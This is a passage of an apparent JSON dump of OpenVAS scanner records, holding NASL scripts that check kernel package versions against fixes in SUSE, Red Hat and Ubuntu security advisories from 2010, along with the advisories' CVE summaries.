script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUSE-SA\", value: \"2010-010\");\n script_cve_id(\"CVE-2009-3939\", \"CVE-2009-4141\", \"CVE-2009-4536\", \"CVE-2009-4538\", \"CVE-2010-0003\", \"CVE-2010-0006\", \"CVE-2010-0007\", \"CVE-2010-0299\");\n script_name(\"SuSE Update for kernel SUSE-SA:2010:010\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE11.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debugsource\", rpm:\"kernel-debug-debugsource~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel-debuginfo\", rpm:\"kernel-debug-devel-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-devel-debuginfo\", rpm:\"kernel-default-devel-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-base-debuginfo\", rpm:\"kernel-desktop-base-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-debuginfo\", rpm:\"kernel-desktop-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-debugsource\", rpm:\"kernel-desktop-debugsource~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-debuginfo\", rpm:\"kernel-pae-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-debugsource\", rpm:\"kernel-pae-debugsource~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-devel-debuginfo\", rpm:\"kernel-pae-devel-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-base-debuginfo\", rpm:\"kernel-trace-base-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-debuginfo\", rpm:\"kernel-trace-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-debugsource\", rpm:\"kernel-trace-debugsource~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla-base-debuginfo\", rpm:\"kernel-vanilla-base-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla-debuginfo\", rpm:\"kernel-vanilla-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla-debugsource\", rpm:\"kernel-vanilla-debugsource~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-debugsource\", rpm:\"kernel-xen-debugsource~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel-debuginfo\", rpm:\"kernel-xen-devel-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-base\", rpm:\"kernel-debug-base~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop\", rpm:\"kernel-desktop~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-base\", rpm:\"kernel-desktop-base~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-devel\", rpm:\"kernel-desktop-devel~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae\", rpm:\"kernel-pae~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-base\", rpm:\"kernel-pae-base~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-devel\", rpm:\"kernel-pae-devel~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace\", rpm:\"kernel-trace~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-base\", rpm:\"kernel-trace-base~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-devel\", rpm:\"kernel-trace-devel~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla\", rpm:\"kernel-vanilla~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla-base\", rpm:\"kernel-vanilla-base~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla-devel\", rpm:\"kernel-vanilla-devel~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-base\", rpm:\"kernel-xen-base~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"preload-kmp-default\", rpm:\"preload-kmp-default~1.1_2.6.31.12_0.1~6.9.12\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"preload-kmp-desktop\", rpm:\"preload-kmp-desktop~1.1_2.6.31.12_0.1~6.9.12\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-19T15:05:01", "references": ["https://www.redhat.com/archives/rhsa-announce/2010-January/msg00013.html", "2010:0046-01"], "pluginID": "1361412562310870210", "description": "Check for the Version of kernel", "edition": 1, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-01-20T00:00:00", "type": "openvas", "title": "RedHat Update for kernel RHSA-2010:0046-01", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3556", "CVE-2009-3939", "CVE-2009-4272", "CVE-2009-2910", "CVE-2009-4141", "CVE-2009-3080", "CVE-2006-6304", "CVE-2009-4020", "CVE-2009-3889", "CVE-2009-4021", "CVE-2009-4138"], "modified": "2018-01-18T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870210", "id": "OPENVAS:1361412562310870210", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for kernel RHSA-2010:0046-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The kernel packages contain the Linux kernel, the core of any Linux\n operating system.\n\n Security fixes:\n \n * an array index error was found in the gdth driver. A local user could\n send a specially-crafted IOCTL request that would cause a denial of service\n or, possibly, privilege escalation. (CVE-2009-3080, Important)\n \n * a flaw was found in the FUSE implementation. When a system is low on\n memory, fuse_put_request() could dereference an invalid pointer, possibly\n leading to a local denial of service or privilege escalation.\n (CVE-2009-4021, Important)\n \n * Tavis Ormandy discovered a deficiency in the fasync_helper()\n implementation. This could allow a local, unprivileged user to leverage a\n use-after-free of locked, asynchronous file descriptors to cause a denial\n of service or privilege escalation. (CVE-2009-4141, Important)\n \n * the Parallels Virtuozzo Containers team reported the RHSA-2009:1243\n update introduced two flaws in the routing implementation. If an attacker\n was able to cause a large enough number of collisions in the routing hash\n table (via specially-crafted packets) for the emergency route flush to\n trigger, a deadlock could occur. Secondly, if the kernel routing cache was\n disabled, an uninitialized pointer would be left behind after a route\n lookup, leading to a kernel panic. (CVE-2009-4272, Important)\n \n * the RHSA-2009:0225 update introduced a rewrite attack flaw in the\n do_coredump() function. A local attacker able to guess the file name a\n process is going to dump its core to, prior to the process crashing, could\n use this flaw to append data to the dumped core file. This issue only\n affects systems that have "/proc/sys/fs/suid_dumpable" set to 2 (the\n default value is 0). (CVE-2006-6304, Moderate)\n \n The fix for CVE-2006-6304 changes the expected behavior: With suid_dumpable\n set to 2, the core file will not be recorded if the file already exists.\n For example, core files will not be overwritten on subsequent crashes of\n processes whose core files map to the same name.\n \n * an information leak was found in the Linux kernel. On AMD64 systems,\n 32-bit processes could access and read certain 64-bit registers by\n temporarily switching themselves to 64-bit mode. (CVE-2009-2910, Moderate)\n \n * the RHBA-2008:0314 update introduced N_Port ID Virtualization (NPIV)\n support in the qla2xxx driver, resulting in two new sysfs pseudo files,\n "/sys/class/scsi_host/[a qla2xxx host]/vport_create" and "vport_delete".\n These two files were world-writable by default, allowing a local ... \n\n Description truncated, for more information please check the Reference URL\";\n\ntag_affected = \"kernel on Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2010-January/msg00013.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870210\");\n script_version(\"$Revision: 8457 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-18 08:58:32 +0100 (Thu, 18 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-01-20 09:25:19 +0100 (Wed, 20 Jan 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"RHSA\", value: \"2010:0046-01\");\n script_cve_id(\"CVE-2006-6304\", \"CVE-2009-2910\", \"CVE-2009-3080\", \"CVE-2009-3556\", \"CVE-2009-3889\", \"CVE-2009-3939\", \"CVE-2009-4020\", \"CVE-2009-4021\", \"CVE-2009-4138\", \"CVE-2009-4141\", \"CVE-2009-4272\");\n script_name(\"RedHat Update for kernel RHSA-2010:0046-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:18:17", "references": ["894-1", "http://www.ubuntu.com/usn/usn-894-1/"], "pluginID": "840383", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-894-1", "edition": 3, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-02-08T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "title": "Ubuntu Update for Linux kernel vulnerabilities USN-894-1", "type": "openvas", "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0007", "CVE-2009-4141", "CVE-2010-0291", "CVE-2009-4538", "CVE-2009-4020", "CVE-2009-4536", "CVE-2009-4308", "CVE-2009-4021", "CVE-2010-0003", "CVE-2009-4031", "CVE-2010-0006", "CVE-2009-4138"], "modified": "2017-12-01T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=840383", "id": "OPENVAS:840383", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_894_1.nasl 7965 2017-12-01 07:38:25Z santu $\n#\n# Ubuntu Update for Linux kernel vulnerabilities USN-894-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Amerigo Wang and Eric Sesterhenn discovered that the HFS and ext4\n filesystems did not correctly check certain disk structures. If a user\n were tricked into mounting a specially crafted filesystem, a remote\n attacker could crash the system or gain root privileges. (CVE-2009-4020,\n CVE-2009-4308)\n\n It was discovered that FUSE did not correctly check certain requests.\n A local attacker with access to FUSE mounts could exploit this to\n crash the system or possibly gain root privileges. Ubuntu 9.10 was not\n affected. (CVE-2009-4021)\n \n It was discovered that KVM did not correctly decode certain guest\n instructions. A local attacker in a guest could exploit this to\n trigger high scheduling latency in the host, leading to a denial of\n service. Ubuntu 6.06 was not affected. (CVE-2009-4031)\n \n It was discovered that the OHCI fireware driver did not correctly\n handle certain ioctls. A local attacker could exploit this to crash\n the system, or possibly gain root privileges. Ubuntu 6.06 was not\n affected. (CVE-2009-4138)\n \n Tavis Ormandy discovered that the kernel did not correctly handle\n O_ASYNC on locked files. A local attacker could exploit this to gain\n root privileges. Only Ubuntu 9.04 and 9.10 were affected. (CVE-2009-4141)\n \n Neil Horman and Eugene Teo discovered that the e1000 and e1000e\n network drivers did not correctly check the size of Ethernet frames.\n An attacker on the local network could send specially crafted traffic\n to bypass packet filters, crash the system, or possibly gain root\n privileges. (CVE-2009-4536, CVE-2009-4538)\n \n It was discovered that "print-fatal-signals" reporting could show\n arbitrary kernel memory contents. A local attacker could exploit\n this, leading to a loss of privacy. By default this is disabled in\n Ubuntu and did not affect Ubuntu 6.06. (CVE-2010-0003)\n \n Olli Jarva and Tuomo Untinen discovered that IPv6 did not correctly\n handle jumbo frames. A remote attacker could exploit this to crash the\n system, leading to a denial of service. Only Ubuntu 9.04 and 9.10 were\n affected. (CVE-2010-0006)\n \n Florian Westphal discovered that bridging netfilter rules could be\n modified by unprivileged users. A local attacker could disrupt network\n traffic, leading to a denial of service. (CVE-2010-0007)\n \n Al Viro discovered that certain mremap operations could leak kernel\n memory. A local attacker could exploit this to consume all available\n memory, leading to a denial of service. (CVE-2010-0291)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-894-1\";\ntag_affected = \"Linux kernel vulnerabilities on Ubuntu 6.06 LTS ,\n Ubuntu 8.04 LTS ,\n Ubuntu 8.10 ,\n Ubuntu 9.04 ,\n Ubuntu 9.10\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-894-1/\");\n script_id(840383);\n script_version(\"$Revision: 7965 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 08:38:25 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-02-08 11:34:22 +0100 (Mon, 08 Feb 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"894-1\");\n script_cve_id(\"CVE-2009-4020\", \"CVE-2009-4021\", \"CVE-2009-4031\", \"CVE-2009-4138\", \"CVE-2009-4141\", \"CVE-2009-4308\", \"CVE-2009-4536\", \"CVE-2009-4538\", \"CVE-2010-0003\", \"CVE-2010-0006\", \"CVE-2010-0007\", \"CVE-2010-0291\");\n script_name(\"Ubuntu Update for Linux kernel vulnerabilities USN-894-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU9.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.28-18-generic\", ver:\"2.6.28-18.59\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.28-18-server\", ver:\"2.6.28-18.59\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.28-18-generic\", ver:\"2.6.28-18.59\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.28-18-server\", ver:\"2.6.28-18.59\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.28-18-virtual\", ver:\"2.6.28-18.59\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"2.6.28-18.59\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc-2.6.28\", ver:\"2.6.28-18.59\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.28-18\", ver:\"2.6.28-18.59\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source-2.6.28\", ver:\"2.6.28-18.59\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.15-55-386\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.15-55-686\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.15-55-k7\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.15-55-server-bigiron\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.15-55-server\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.15-55\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) 